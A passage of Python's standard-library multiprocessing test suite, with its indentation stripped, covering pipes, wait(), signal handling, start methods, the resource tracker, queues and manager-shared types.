class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
